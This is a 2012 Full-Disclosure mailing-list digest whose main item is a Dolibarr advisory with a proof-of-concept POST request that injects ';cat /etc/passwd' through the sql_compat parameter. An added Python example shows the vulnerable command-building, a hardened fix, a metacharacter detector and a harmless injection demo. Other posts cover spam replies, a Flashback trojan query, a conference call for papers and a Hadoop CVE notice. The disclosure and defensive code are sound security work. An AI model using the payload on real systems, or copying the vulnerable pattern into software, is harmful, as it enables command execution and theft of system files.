[Full-disclosure] Dolibarr ERP & CRM OS Command Injection

2012-04-06 Thread Nahuel Grisolia
Dolibarr ERP & CRM OS Command Injection
===

1. Advisory Information
Date published: 2012-4-6
Vendors contacted: Dolibarr
Release mode: Coordinated release

2. Vulnerability Information
Class: Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes

3. Software Description
Dolibarr ERP & CRM is a modern web application for managing business activity 
(contacts, invoices, orders, stock, agenda, etc.). It is open-source, free software 
designed for small companies, foundations and freelancers.

4. Vulnerability Description
Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data 
is sent to an interpreter as part of a command or query. The attacker’s hostile 
data can trick the interpreter into executing unintended commands or accessing 
unauthorized data.

5. Vulnerable packages
Dolibarr <= 3.1.1
Dolibarr <= 3.2.0

6. Non-vulnerable packages
The vendor said that the vulnerability is fixed in the development version of the 
3.2.x branch; the fix for the 3.1.x branch will be published by June. The vendor 
accepted public disclosure of this vulnerability.

7. Credits
This vulnerability was discovered by Nahuel Grisolia 
( nahuel @ cintainfinita.com.ar )

8. Technical Description
8.1. OS Command Injection – PoC Example
CVSSv2 Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
Dolibarr is prone to a remote command execution vulnerability because the 
software fails to adequately sanitize user-supplied input.
In the proof of concept below, the sql_compat parameter of the database backup 
form (admin/tools/export.php, what=mysql) reaches the mysqldump invocation 
without sanitization, so an authenticated user (note the session cookie and 
token; CVSS Au:S) can terminate the intended command with ";" and append an 
arbitrary shell command, here copying /etc/passwd into /tmp.
Successful attacks run commands with the privileges of the web server process 
and can compromise the affected web server and its software.
The following proof of concept is given:
POST /dolibarr/admin/tools/export.php HTTP/1.1
[…]
Cookie: DOLSESSID_[…]=[…]

token=[...]&export_type=server&what=mysql&mysqldump=%2Fusr%2Fbin%2Fmysqldump&use_transaction=yes&disable_fk=yes&sql_compat=;cat /etc/passwd > /tmp/cintainfinitapasswd;&sql_structure=structure&drop=1&sql_data=data&showcolumns=yes&extended_ins=yes&delayed=yes&sql_ignore=yes&hexforbinary=yes&filename_template=mysqldump_dolibarrdebian_3.1.1_201203231716.sql&compression=none


9. Report Timeline
* 2012-03-26 / Vendor notification
* 2012-03-27 / Vulnerability details sent to Vendor
* 2012-03-27 / Vendor fix – See 6. Non-vulnerable packages
* 2012-04-06 / Public Disclosure – PoC attached
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
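
The command injection pattern described in section 8.1, as an added example that is not part of the advisory and not Dolibarr's own code. It assumes (the advisory does not show the source) that export.php concatenates sql_compat into a mysqldump command line that is then run by a shell; the request body, the "dolibarr" database name and all function names are constructed for the illustration. The block shows the vulnerable string-building beside an allow-list plus argv-list fix, runs the vulnerable line through /bin/sh with a harmless payload to show the breakout, and includes a decoder that flags the injected parameter in a request body shaped like the PoC's:

```python
"""Shape of the export.php flaw and its fix (added example, not Dolibarr code).

Assumptions, not taken from the advisory: the vulnerable code builds the
mysqldump command line by string concatenation and hands it to a shell; the
fixed version validates sql_compat against mysqldump's documented
--compatible modes and invokes the binary without a shell.
"""
import re
import subprocess
from typing import Dict, List
from urllib.parse import parse_qs

# Modes mysqldump documents for --compatible; anything else is rejected.
MYSQLDUMP_COMPAT_MODES = frozenset({
    "ansi", "mysql323", "mysql40", "postgresql", "oracle", "mssql", "db2",
    "maxdb", "no_key_options", "no_table_options", "no_field_options",
})

# Characters that let a value break out of a single argument under /bin/sh.
SHELL_META = re.compile(r"[;&|`$<>()\r\n]")

# Constructed request body modelled on the advisory's PoC (spaces %-encoded,
# token shortened); not a capture from a real system.
POC_BODY = (
    "token=abc&export_type=server&what=mysql&mysqldump=%2Fusr%2Fbin%2Fmysqldump"
    "&use_transaction=yes&disable_fk=yes"
    "&sql_compat=;cat%20/etc/passwd%20>%20/tmp/cintainfinitapasswd;"
    "&sql_structure=structure&drop=1&sql_data=data&compression=none"
)


def build_command_vulnerable(sql_compat: str, db: str = "dolibarr",
                             mysqldump: str = "/usr/bin/mysqldump") -> str:
    """Assumed vulnerable shape: the user-supplied mode is concatenated into
    one string that a shell will run, so ';' ends mysqldump's argument list
    and starts a second command."""
    cmd = f"{mysqldump} {db}"
    if sql_compat and sql_compat != "NONE":
        cmd += " --compatible=" + sql_compat
    return cmd


def build_command_hardened(sql_compat: str, db: str = "dolibarr",
                           mysqldump: str = "/usr/bin/mysqldump") -> List[str]:
    """Hardened shape: allow-list the mode and return an argv list. Passing a
    list to subprocess.run (no shell=True) means metacharacters are never
    interpreted, so even a value that slipped past the allow-list would reach
    mysqldump as one literal argument."""
    argv = [mysqldump, db]
    if sql_compat and sql_compat != "NONE":
        if sql_compat not in MYSQLDUMP_COMPAT_MODES:
            raise ValueError(f"rejected sql_compat value: {sql_compat!r}")
        argv.append("--compatible=" + sql_compat)
    return argv


def accepts(sql_compat: str) -> bool:
    """True if the hardened builder would accept this sql_compat value."""
    try:
        build_command_hardened(sql_compat)
        return True
    except ValueError:
        return False


def flag_injected_params(post_body: str) -> Dict[str, str]:
    """Detection helper for a WAF rule or log review: decode an
    x-www-form-urlencoded body and return the parameters whose value carries
    shell metacharacters. separator is passed explicitly so a ';' inside a
    value is not mistaken for a parameter separator (older Pythons did that)."""
    decoded = parse_qs(post_body, keep_blank_values=True, separator="&")
    return {name: value
            for name, values in decoded.items()
            for value in values
            if SHELL_META.search(value)}


def demo_injection() -> str:
    """Run the vulnerable command line through /bin/sh with a harmless payload
    and 'true' standing in for mysqldump. The shell executes the injected
    second command; its stdout is the evidence of the breakout."""
    cmd = build_command_vulnerable(";echo INJECTED", mysqldump="true")
    done = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True)
    return done.stdout


if __name__ == "__main__":
    print("flagged:", flag_injected_params(POC_BODY))
    print("vulnerable shell output:", demo_injection().strip())
    print("hardened argv:", build_command_hardened("ansi"))
    print("hardened accepts payload?", accepts(";echo INJECTED"))
```

The allow-list is the real control: a value that is not one of mysqldump's documented --compatible modes has no business on the command line. The argv list is defence in depth, since subprocess without shell=True hands each element to execve as a single argument. The flag_injected_params helper is the kind of check a reviewer would run over access or WAF logs for the same form, since it submits other values (the mysqldump path, filename_template) that deserve the same scrutiny.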


Re: [Full-disclosure] PenTest Market is for FREE Now

2012-04-06 Thread Dave
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On 05/04/2012 15:28, Krzysztof Marczyk wrote:
> We have great news for you. You can have PenTest Market for free now. Just
> create a free account and enjoy 50 pages of PenTest Market for FREE every
> month!  Register now from this link:
> http://pentestmag.com/wp-login.php?action=register
> 
> For those who didn’t have the opportunity to become familiar with PenTest
> Market – this is a new magazine devoted exclusively to pentesting/ IT
> security business. If you wonder: What emplyers expect from pentesters/ IT
> security specialists? How to become a pentester/ IT security specialist?
> How to recruit ideal pentester/ IT security specialist? How does
> pentesting/ IT security market work? How to start your own IT security
> company? What do clients expect from pentesting services? - this magazine
> is exactly for you!
> 
> Create an account for free and Download PenTest Market for Free!
> http://pentestmag.com/wp-content/uploads/downloads/2012/04/vol1-no1-March2012-PenTestMarket-yes.jpg.pdf


I'm a noob and there is nothing in this magazine I don't already know.
Although your mag might just enlighten the very clueless to some small extent.
Full disclosure is not the place to promote your advertisement-riddled magazine.

This publication needs to target not pen testers and security specialists, but 
the clueless middle and upper management with business degrees
and little understanding of IT security.

There are real professionals here, proper coders and hackers, people with 
genuine skills (myself not included).
Can you imagine how they see your publication?

Regards
Dave

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBT39ts7Ivn8UFHWSmAQLC2wgAny++Xs55UEJ0tQrkT2KO1nkHFlx+g4Yp
XZ0AnQljkd1q5BAIHMofnfSkFtRDUa07X0pxFJGynyh8k0t/p33ldSadHuHWUbH4
HNDbjn37xYzqaRuOIU6713LGkF9o8GRTJp2jum19P/taxzu8X5cOPS4kxKFlTygW
RKq6no0hq7Dpz7l8AUsqMxcPQhDxECeIBi1bFwVdrFYoaCaZh8tm1+d9eDv3/Hrp
Emn6kilWvf4azCDgCps3biQvQgZMY80g6kt5MC8db4RswDCr1EUKmx+2S4a1x1Rv
n+Kig+NgD+n1zsRuWDYAo9yhG/euDDUbs0rbMjMlcKx1ZBSviN7SoA==
=fLrE
-END PGP SIGNATURE-



Re: [Full-disclosure] PenTest Market is for FREE Now

2012-04-06 Thread John Jacobs

> {SNIP} If you wonder: What emplyers expect
> from pentesters/ IT security specialists?

Would it be premature of me to think one of the things "emplyers [sic]" would 
expect would be proper spelling and proofreading, especially when making a 
product announcement peddling my wares?

Cheers,
John Jacobs
  


[Full-disclosure] PenTest Market is for FREE Now

2012-04-06 Thread Krzysztof Marczyk
We have great news for you. You can have PenTest Market for free now. Just
create a free account and enjoy 50 pages of PenTest Market for FREE every
month!  Register now from this link:
http://pentestmag.com/wp-login.php?action=register

For those who didn’t have the opportunity to become familiar with PenTest
Market – this is a new magazine devoted exclusively to pentesting/ IT
security business. If you wonder: What emplyers expect from pentesters/ IT
security specialists? How to become a pentester/ IT security specialist?
How to recruit ideal pentester/ IT security specialist? How does
pentesting/ IT security market work? How to start your own IT security
company? What do clients expect from pentesting services? - this magazine
is exactly for you!

Create an account for free and Download PenTest Market for Free!
http://pentestmag.com/wp-content/uploads/downloads/2012/04/vol1-no1-March2012-PenTestMarket-yes.jpg.pdf

[Full-disclosure] Drop box

2012-04-06 Thread Fatherlaptop
Ever do a google query for public and or shared files? 

From: Randy

It's an iPhone Thang!
Was learning cursive necessary?



Re: [Full-disclosure] mac trojan

2012-04-06 Thread Carl "Thomas" Guething
http://www.f-secure.com/v-descs/trojan-downloader_osx_flashback_i.shtml

Regards,
T

On Thu, Apr 5, 2012 at 10:30 AM, RandallM  wrote:

> can someone tell me what effects there are to being infected with
> flashback? signs? google search just brings up the same same news
> stories.
>
> also, if one is.. it seems there are some files that cannot be
> recovered so new install necessary?
>
> --
> been great, thanks
> RandyM
> a.k.a System
>

[Full-disclosure] Shakacon CFP - Extended Deadline: April 13, 2012

2012-04-06 Thread Shakacon
Thanks to everyone for all the submissions received and the committee is
evaluating them for selection.  If you are on the fence about submitting
remember - All selected speakers will  receive compensation to cover
Airfare and 2 hotel nights in Honolulu, Hawaii.  Not to mention you get
to hang out with a great group of people in a laid back locale.  We are
extending the CFP deadline to April 13, 2012 in the hopes of receiving a
few more submissions.


Shakacon IV  - Honolulu Hawaii

"Sun, Surf, and C Shells"

  CALL FOR PAPERS

 http://www.shakacon.org/cfp.txt


Who: Shakacon Crew
What:Shakacon IV
When:June 18-21 2012
Where:   Paradise aka Honolulu Hawaii (nuff said)
Why: Why NOT?
How: By plane, boat, canoe, yacht, hydrofoil, stand-up paddle board, jetski,
 long board, dolphin, whale sled, nuclear submarine, etc.


[Overview]

After taking two years off to work on our surfing skills we decided it
was time to bring some top notch technical talent back to one of the
most remote locations on earth.  

Sitting around somewhere freezing your a$$ off?  Dreaming about warm
days, rainbows, decadent tropical drinks sipped out of coconuts? Sure
you could drop your 0day in Vegas, bring down the Internet in Germany,
or satisfy your dark desires in Asia; however, wouldn't you rather
submit your research or topics to our CFP and maybe win yourself a paid
trip to Hawaii?  

The Shakacon security conference is a laid back conference where
industry, government, academia and independent experts will get together
to share knowledge and experience in one of the most beautiful places on
Earth.  

Shakacon will offer local, national, and international participants a
casual, social, learning environment designed to present a "holistic"
security view and the opportunity to network with peers and fellow
enthusiasts in a relaxed setting.  Leave your ego at the airport (or
shoreline if you come in via another method) as we look forward to
attendees varying in skill level from N00b to Ninja.
  
During the day, sessions will include best practices, case studies, research
projects, etc., covering all different aspects of the information security landscape.
There will be something for everyone and if sitting through talks isn't
your cup of kava, there will be exciting events and contests for you to
sharpen your skills and knowledge on.



[Trainer Opportunities]

Don't want to speak at the Con but have an uncanny ability to teach and
a proven track record for delivering quality courseware and want to come
to Hawaii? We're also interested in bringing in trainers to provide
world class training leading up to Shakacon (June 18 and 19). Submit a
synopsis/class agenda, prior teaching experience, and maybe get selected
to teach in Hawaii.


 
[CFP Details]

(1) Abstract for papers must be submitted to the review committee by
_April 13, 2012_.

(2) Selection notification will occur by _April 20, 2012_ and abstracts
posted to the site by _April 27, 2012_.

(3) Full Slides for your papers must be submitted by _May 18, 2012_.

CFP Review Committee:

Caleb Sima
Katie Mossouris
Val Smith
Matthieu Suiche
Vincenzo Iozzo
Kent Backman
Jonathan Brossard
Daniel Hodson
Kris Harms
Mark Ryan Talabis
Chris Potter
Jason Martin

There are a limited number of speaking sessions for which the conference
organizers will provide travel and accommodations so please submit your
abstract early if you are interested in speaking.  Speaking slots will
be 55 minutes long (45 minutes for your talk and 10 minutes for Q&A);
however, we will accept "turbo" talk submissions and if we have enough
we'll blend them into a block of the conference.

The audience will be a broad mix of professional, academic, and
enthusiast, so we welcome both technical and non-technical submissions
on all aspects of security.  The key criteria are practicality and
timeliness.  
We want to provide our attendees with up to date materials they can take
away and immediately gain benefit from as well as new research or tools.
Absolutely NO SALES presentations will be accepted.



Proposals should include:
 

 
"Shakacon CFP Submission: , "


1. Name, address, and contact info.
2. Employer and/or affiliations.
3. Brief biography.
4. Presentation experience.
5. Topic summary.
6. Reason this topic should be considered.
7. Other publications or conferences where this material has been or
will be published/submitted.
  
Please include plain text of all information provided in the body of
your email as well as any file attachments. 
The plain text information will be reviewed first to find the most
suitable candidates.

Please forward the above information to cfp at shakacon.org
  in order to be considered.


  
More conference information, registration details, and travel partner
deals will be posted to:
 
http://www.shakacon.org

Fo

Re: [Full-disclosure] [funsec] mac trojan

2012-04-06 Thread Charlie Derr
On 04/05/2012 10:30 AM, RandallM wrote:
> can someone tell me what effects there are to being infected with
> flashback? signs? google search just brings up the same same news
> stories.
>
> also, if one is.. it seems there are some files that cannot be
> recovered so new install necessary?
>

No personal experience (yet) but perhaps this will be helpful:

http://www.f-secure.com/v-descs/trojan-downloader_osx_flashback_i.shtml



[Full-disclosure] [CVE-2012-1574] Apache Hadoop user impersonation vulnerability

2012-04-06 Thread Aaron T. Myers
Hello,

Users of Apache Hadoop should be aware of a security vulnerability recently
discovered, as described by the following CVE. In particular, please note
the "Users affected", "Versions affected", and "Mitigation" sections.

Best,
Aaron

--
Aaron T. Myers
Software Engineer, Cloudera

CVE-2012-1574: Apache Hadoop user impersonation vulnerability

Severity: Critical

Vendor: The Apache Software Foundation

Versions Affected:
Hadoop 0.20.203.0, 0.20.204.0, and 0.20.205.0
Hadoop 1.0.0 to 1.0.1
Hadoop 0.23.0 to 0.23.1.

Users affected: Users who have enabled Hadoop's Kerberos/MapReduce security
features.

Impact: Vulnerability allows an authenticated malicious user to impersonate
any other user on the cluster.

Mitigation:
0.20.20x.x and 1.0.x users should upgrade to 1.0.2
0.23.x users should upgrade to 0.23.2 when it becomes available

Credit:
This issue was discovered by Aaron T. Myers of Cloudera.